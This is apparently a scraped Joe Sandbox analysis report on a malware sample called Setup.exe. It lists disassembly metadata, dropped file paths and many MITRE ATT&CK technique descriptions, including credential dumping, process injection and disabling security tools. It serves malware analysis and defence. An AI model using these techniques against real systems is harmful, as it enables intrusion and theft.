Instruction ID: 96cb8b46c63a5d17b07dc7f96724a2aad20d24b8d94c734577ed26f12f1ae458
Opcode Fuzzy Hash: 053a32f9c9c7258e00e2ba39528286f010ed681b633031af056265b5645590ea
Instruction Fuzzy Hash: BBF03772609558EFCB019F54DC45B99B7B8FB45B10F014216EC1293750D7B569409BC0

Function 00910CEA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 006FCD60: InitializeCriticalSectionAndSpinCount.KERNEL32(00A669F8,00000000,275F26E1,006E0000,Function_0025C660,000000FF,?,00910D19,?,?,?,006E7B4A), ref: 006FCD85
Part of subcall function 006FCD60: GetLastError.KERNEL32(?,00910D19,?,?,?,006E7B4A), ref: 006FCD8F

IsDebuggerPresent.KERNEL32(?,?,?,006E7B4A), ref: 00910D1D
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,006E7B4A), ref: 00910D2C

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00910D27

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 450123788-631824599
Opcode ID: 739983d00ac6c6a3e9045e6e1fc25d9f1148e413ba9b8e09eed276c590ee2636
Instruction ID: 3d6addac632a774cc9bb8573fbbc37f45fe44788f066e95532f1893e8fd809d6
Opcode Fuzzy Hash: 739983d00ac6c6a3e9045e6e1fc25d9f1148e413ba9b8e09eed276c590ee2636
Instruction Fuzzy Hash: 97E030B47047048ED3209FA9E804746FAE4AF45704F008D6DE451C7240D7F1E485CB91

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Setup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\559de9.rbs

C:\ProgramData\5FUK68YUSJM7\C2VKNO8Q1

C:\ProgramData\5FUK68YUSJM7\GLX4O8

C:\ProgramData\5FUK68YUSJM7\NYMOHD

C:\Users\Public\Desktop\Setup.exe

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\json[1].json

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\lem[1].exe

C:\Users\user\AppData\Local\Temp\402438\N

C:\Users\user\AppData\Local\Temp\402438\Suicide.com

C:\Users\user\AppData\Local\Temp\Argue

Windows Analysis Report
Setup.exe

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre